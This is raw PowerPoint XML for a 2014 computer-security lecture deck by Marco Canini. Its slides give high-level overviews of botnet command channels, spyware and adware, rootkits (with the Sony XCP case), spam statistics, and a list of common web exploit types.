              <a:t>Functionalities: downloading other programs, spying on the network, screen, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>keyboard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Communication mode: listen on predefine TCP or UDP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Better: connect to a master through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IRC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or P2P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even better: communication via ICMP or DNS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3615533979"/>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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342018" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Spywares &amp; Adwares</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342019" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spywares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adwares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are either installed by viruses or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pages that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>manipulate unpatched browsers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the browser’s behavior</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Display pop-ups with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>search results</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modify the ads that are shown in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web pages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the home page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collect and send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>private information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182064737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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344066" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Rootkits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344067" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rootkits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the operating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>system in order to hide running programs, files or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>configurations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sony</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has distributed a copy protection software (XCP) that used a rootkit to prevent users to uninstall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>had to offer exchange of all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CDs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49929460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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploits on the Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1AE541A8-D53F-3F4B-99AF-9027B68691FD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382057066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it a problem?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lost productivity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Symantec: Study on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>users shows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>65</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>% spend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>more than 10’ a day to delete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>spam emails, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>24% more than 20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stress on the infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sophos: “92.3 percent of all email sent during the first three months of 2008 was spam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Annoying</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful emails lost</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C270C27E-8536-9149-9DA9-3AFF6BC96CEE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23210524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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346114" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346115" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>contain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flaws</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These bugs can be exploited by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hackers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a method or script that allows exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bugs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The most interesting are exploits on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>servers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They can be done </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>remotely</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Servers often have higher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3833383306"/>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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400386" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary of Exploits on the Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Directory Traversal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Phishing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
